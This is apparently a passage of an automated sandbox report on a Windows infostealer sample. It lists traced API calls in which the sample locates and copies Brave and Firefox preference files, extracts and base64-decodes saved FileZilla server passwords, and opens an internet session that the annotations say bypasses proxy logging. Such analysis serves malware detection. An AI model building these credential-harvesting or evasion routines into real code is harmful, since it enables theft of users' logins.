                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC4C
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDC8F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007BDCD0
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007BDCF0
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007BDD0A
                              • lstrlen.KERNEL32(007DCFEC), ref: 007BDD1D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDD7B
                              • lstrlen.KERNEL32(007E1794), ref: 007BDD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDA3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDDAF
                              • lstrlen.KERNEL32(?), ref: 007BDDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 007BDDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDE19
                              • lstrlen.KERNEL32(007E1794), ref: 007BDE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDE6F
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDE7B
                              • lstrlen.KERNEL32(014587F8), ref: 007BDE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDEBB
                              • lstrlen.KERNEL32(007E1794), ref: 007BDEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDEE6
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDEF2
                              • lstrlen.KERNEL32(01458AA8), ref: 007BDF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFA5
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDFB1
                              • lstrlen.KERNEL32(014587F8), ref: 007BDFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDFF4
                              • lstrlen.KERNEL32(007E1794), ref: 007BDFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE022
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BE02E
                              • lstrlen.KERNEL32(01458AA8), ref: 007BE03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BE06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 007BE0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 007BE0E7
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE11F
                              • lstrlen.KERNEL32(0145CF08), ref: 007BE12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE155
                              • lstrcat.KERNEL32(00000000,?), ref: 007BE15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE19F
                              • lstrcat.KERNEL32(00000000), ref: 007BE1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007BE1F9 (bFailIfExists = 1: an already staged copy of Preferences is not overwritten)
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE22F
                              • lstrlen.KERNEL32(01458B08), ref: 007BE23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE261
                              • lstrcat.KERNEL32(00000000,01458B08), ref: 007BE269
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007BE988
                              • FindClose.KERNEL32(00000000), ref: 007BE997
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                              • String ID: Brave$Preferences$\Brave\Preferences
                              • API String ID: 1346089424-1230934161
                              • Opcode ID: bd79fc814db0b0a22c0f5442525f4fdf845871a7510511efb15b1c80842c34da
                              • Instruction ID: 44bead404b6cf749fabc83db3a3d4c52dc43a6705769d60f38d330fe0596e20d
                              • Opcode Fuzzy Hash: bd79fc814db0b0a22c0f5442525f4fdf845871a7510511efb15b1c80842c34da
                              • Instruction Fuzzy Hash: 99523E71A15646DBDB21EF64DC89BEE77B9AF44300F044528F846AB352DB38EC46CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B60FF
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6152
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6185
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B61B5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B61F0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6223
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B6233 (dwAccessType 1 = INTERNET_OPEN_TYPE_DIRECT: the system proxy configuration is bypassed, so an egress proxy log will not see this traffic)
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: e2cc1ebde94f6b403c987facf1ed385e5341f3d54f8ee645630f84b06272317a
                              • Instruction ID: c2352dcfd247bbd9fe1ad16369edd137d5a765bce0868162dedf0987c117d334
                              • Opcode Fuzzy Hash: e2cc1ebde94f6b403c987facf1ed385e5341f3d54f8ee645630f84b06272317a
                              • Instruction Fuzzy Hash: 9652077191525A9BDB21EFA4DC89BEE77B9AF44300F158424F905BB252DB3CED02CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B4C7F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4CD2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4D05
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4D35
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4D73
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4DA6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B4DB6 (dwAccessType 1 = INTERNET_OPEN_TYPE_DIRECT, same proxy-bypassing session setup as the routine at 007B6233)
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: e9b8eac3c6da017613549664a9ca88ead9259d45c5ceea87f879af111276d187
                              • Instruction ID: 36f16041318b49db1b2173322b0ffe6d9829bf7f9821a0d8248579cae799cbfd
                              • Opcode Fuzzy Hash: e9b8eac3c6da017613549664a9ca88ead9259d45c5ceea87f879af111276d187
                              • Instruction Fuzzy Hash: D5525A31916256DBDB21EFA4DC89BEE77B9AF04300F154425F905BB252DB38ED42CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6B9D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6BCD
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6BFD
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6C2F
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 007C6C3C
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007C6C43 (GetProcessHeap takes no arguments; the two values the tracer attributes to it are the pending RtlAllocateHeap arguments, Flags 0 and Size 0xF423F = 999999 bytes, the buffer that the StrStrA calls below scan for the XML tags)
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 007C6C5A
                              • lstrlen.KERNEL32(00000000), ref: 007C6C65
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6CCF
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 007C6CE2
                              • lstrlen.KERNEL32(00000000), ref: 007C6CED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6D30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6D57
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 007C6D6A
                              • lstrlen.KERNEL32(00000000), ref: 007C6D75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6DB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6DDF
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007C6DF2
                              • lstrlen.KERNEL32(00000000), ref: 007C6E01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6E49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6E71
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007C6E94 (dwFlags 1 = CRYPT_STRING_BASE64; cchString 0 = NUL-terminated input; pbBinary NULL = size query only)
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 007C6EA8 (uFlags 0x40 = LPTR; the usual pattern is to size this buffer from the query above)
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 007C6EC9 (second call decodes the base64 <Pass> value into that buffer)
                              • LocalFree.KERNEL32(00000000), ref: 007C6ED4
                              • lstrlen.KERNEL32(?), ref: 007C6F6E
                              • lstrlen.KERNEL32(?), ref: 007C6F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: 9e36c85ab681ee92aa0ed65d50935b538a1cbb826ac63bbb13a54072e57b944e
                              • Instruction ID: 25081bc5ba9c6be2902781711a6a1fc8fa6584f31adf3e04ad81290c1139d2ff
                              • Opcode Fuzzy Hash: 9e36c85ab681ee92aa0ed65d50935b538a1cbb826ac63bbb13a54072e57b944e
                              • Instruction Fuzzy Hash: 18027171A15256ABDB21EBB4DC8DF9E7BB9AF44700F144459F806EB242DB38DD02CB60
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4B7F
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BA7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C4BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: 55f1d52769a8daf643d472af863efbbe57a1ee347af9f5fa640c912811555879
                              • Instruction ID: 8802d4f30efaad42a37400642d7438d72352aae921c3e2ed1cbe25e0bba3ab90
                              • Opcode Fuzzy Hash: 55f1d52769a8daf643d472af863efbbe57a1ee347af9f5fa640c912811555879
                              • Instruction Fuzzy Hash: 39923F70A15641CFDB24CF29D988F5AB7F5AF44714F1981ADE8099B362D73AEC82CB40
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C12BF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12E7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C133A
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C135C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C1376
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C13E2
                              • lstrlen.KERNEL32(007E1794), ref: 007C13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C140A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1416
                              • lstrlen.KERNEL32(?), ref: 007C1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1443
                              • lstrcat.KERNEL32(00000000,?), ref: 007C1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C147A
                              • StrCmpCA.SHLWAPI(?,0145CFE0), ref: 007C14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1535
                              • StrCmpCA.SHLWAPI(?,0145D0E0), ref: 007C1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C15E4
                              • StrCmpCA.SHLWAPI(?,0145CF98), ref: 007C1602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1633
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C165C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1685
                              • StrCmpCA.SHLWAPI(?,0145CF50), ref: 007C16B3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C16F4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C171D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1745
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007C181C
                              • FindClose.KERNEL32(00000000), ref: 007C182B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 6d7446915f0829011edf0b408f2aae859289e54e75a4abd5842532ec72943ae1
                              • Instruction ID: 1d1c31a2d31ec1a31a2141de1fc94919b0277458b5211a2dc1d7b3ee0c424517
                              • Opcode Fuzzy Hash: 6d7446915f0829011edf0b408f2aae859289e54e75a4abd5842532ec72943ae1
                              • Instruction Fuzzy Hash: 05126E71A152469BDB25EF78D889FAE77B8AF45300F44453CF84AE7252DB38EC058B90
                              APIs
                              • wsprintfA.USER32 ref: 007CCBFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CCC13
                              • lstrcat.KERNEL32(?,?), ref: 007CCC5F
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CCC71
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CCC8B
                              • wsprintfA.USER32 ref: 007CCCB0
                              • PathMatchSpecA.SHLWAPI(?,01458B78), ref: 007CCCE2
                              • CoInitialize.OLE32(00000000), ref: 007CCCEE
                                • Part of subcall function 007CCAE0: CoCreateInstance.COMBASE(007DB110,00000000,00000001,007DB100,?), ref: 007CCB06
                                • Part of subcall function 007CCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007CCB46
                                • Part of subcall function 007CCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 007CCBC9
                              • CoUninitialize.COMBASE ref: 007CCD09
                              • lstrcat.KERNEL32(?,?), ref: 007CCD2E
                              • lstrlen.KERNEL32(?), ref: 007CCD3B
                              • StrCmpCA.SHLWAPI(?,007DCFEC), ref: 007CCD55
                              • wsprintfA.USER32 ref: 007CCD7D
                              • wsprintfA.USER32 ref: 007CCD9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 007CCDB0
                              • wsprintfA.USER32 ref: 007CCDD8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007CCDF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 007CCE10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 007CCE28
                              • CloseHandle.KERNEL32(00000000), ref: 007CCE33
                              • CloseHandle.KERNEL32(00000000), ref: 007CCE3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007CCE54
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CCE94
                              • FindNextFileA.KERNEL32(?,?), ref: 007CCF8D
                              • FindClose.KERNEL32(?), ref: 007CCF9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
